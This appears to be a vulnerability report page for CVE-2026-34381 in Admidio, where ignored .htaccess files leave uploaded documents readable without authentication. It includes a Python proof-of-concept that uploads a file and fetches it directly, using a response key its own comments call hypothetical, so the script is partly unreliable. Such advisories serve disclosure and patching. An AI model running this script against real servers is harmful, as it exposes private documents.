Security Vulnerability Report
CVE-2026-34381 CVSS 7.5 HIGH

Published: 2026-03-31 21:16:30
Last Modified: 2026-04-01 18:24:08

Description

Admidio is an open-source user management solution. From version 5.0.0 to before version 5.0.8, Admidio relies on adm_my_files/.htaccess to deny direct HTTP access to uploaded documents. The Docker image ships with AllowOverride None in the Apache configuration, which causes Apache to silently ignore all .htaccess files. As a result, any file uploaded to the documents module, regardless of the role-based permissions configured in the UI, is directly accessible over HTTP without authentication by anyone who knows the file path. The file path is disclosed in the upload response JSON. This issue has been patched in version 5.0.8.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Exploitability Score: 3.9
Impact Score: 3.6

Configurations (Affected Products)

cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* - VULNERABLE
Admidio >= 5.0.0, < 5.0.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# Target URL (Example)
target_url = "http://target-admidio-domain.com"
upload_url = f"{target_url}/adm_program/modules/documents/documents_upload.php"

# Attacker's file
files = {'userfile': ('exploit_test.txt', 'Sensitive Content', 'text/plain')}

# Step 1: Upload the file to get the path
# Note: Depending on config, authentication might be needed for upload, but file access is the issue.
# Assuming upload endpoint is reachable or we have a low-priv user.
session = requests.Session()
response = session.post(upload_url, files=files)

if response.status_code == 200:
    try:
        data = response.json()
        # Extract file path from JSON response
        file_path = data.get('file_path')  # Hypothetical key based on description
        print(f"[+] File uploaded. Path disclosed: {file_path}")

        # Step 2: Access the file directly without authentication
        # The vulnerability states .htaccess is ignored, so direct access works.
        direct_access_url = f"{target_url}/{file_path}"
        print(f"[*] Attempting direct access: {direct_access_url}")
        file_response = requests.get(direct_access_url)

        if file_response.status_code == 200:
            print("[!] Vulnerability Confirmed! File content downloaded:")
            print(file_response.text)
        else:
            print("[-] Failed to access file directly.")
    except json.JSONDecodeError:
        print("[-] Could not parse JSON response.")
else:
    print(f"[-] Upload failed with status code: {response.status_code}")
```

References

https://github.com/Admidio/admidio/commit/5f770c1ca81a4f6b02136280cd63316a35aabaaf (Patch)
https://github.com/Admidio/admidio/security/advisories/GHSA-7fh7-8xqm-3g88 (Exploit, Mitigation, Vendor Advisory)

Weakness: CWE-284 (Improper Access Control)